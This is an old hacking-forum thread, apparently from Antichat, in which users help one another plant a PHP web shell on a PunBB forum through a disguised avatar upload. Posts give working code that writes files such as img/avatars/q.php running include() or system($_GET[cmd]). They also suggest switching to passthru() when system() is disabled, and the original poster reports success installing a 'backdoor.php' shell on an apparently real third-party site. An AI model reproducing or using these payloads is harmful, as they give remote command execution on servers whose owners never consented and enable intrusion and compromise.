About punbb video... :)

Discussion in 'Forum for discussion of ANTICHAT' started by néM3S!s, 9 Oct 2005.

  1. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    io !!! :D

    http://video.antichat.net/videos/ShAnKaR/xak.rar

    I have an error with the picture.. :rolleyes:

    Parse error: parse error, unexpected ')' in /space_3/mrtom/forum/img/avatars/q.php on line 1

    My picture :

    <?
    $fd=fopen('img/avatars/q.php','w+');
    fwrite($fd,"<? include($fuck); ?>")
    fclose($fd);
    ?>

    Please, somebody to give me an original picture ? :)

    Thank'S
     
  2. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Right code:

    <?
    $f = fopen( "img/avatars/q.php", "w");
    fwrite( $f, "<? include($fuck); ?>" );
    fclose( $f );
    ?>


    or


    $f = fopen( "img/avatars/q.php", "w");
    fwrite( $f, "<? system($fuck); ?>" );
    fclose( $f );
    ?>

    - then $fuck parameter specify SHELL COMMAND, not file to include
     
  3. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    <?php
    $shell="<?php system(\$_GET[cmd]);?>";
    $fopen=fopen("img/avatars/q.php","a+");
    fwrite($fopen,$shell);
    ?>

    Make so if you have access in that directory then all will work..
     
  4. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    and fclose($fopen);
    or fflush($fopen);
     
  5. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    It is possible to not close all and so will work %)
     
  6. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1

    with :

    <?php
    $shell="<?php system(\$_GET[cmd]);?>";
    $fopen=fopen("img/avatars/c.php","a+");
    fwrite($fopen,$shell);
    ?>

    :rolleyes:

    not other means?
     
  7. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    system() function created for execute commands, system( "ls -ailrt" ); for example.
    this function was disabled for security reasons by admin. try to change system() to passthru().
    if there has not works, use only file includin'... you can see it on ShAnKaR's video...

    че сказал сам нипонил
     
  8. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    no good..

    BUT !! !! !!!!

    I put the code of "backdoor.php" (shellZ) in the picture and it's Good ! :D

    Thx KeZ and others [​IMG]
     
Loading...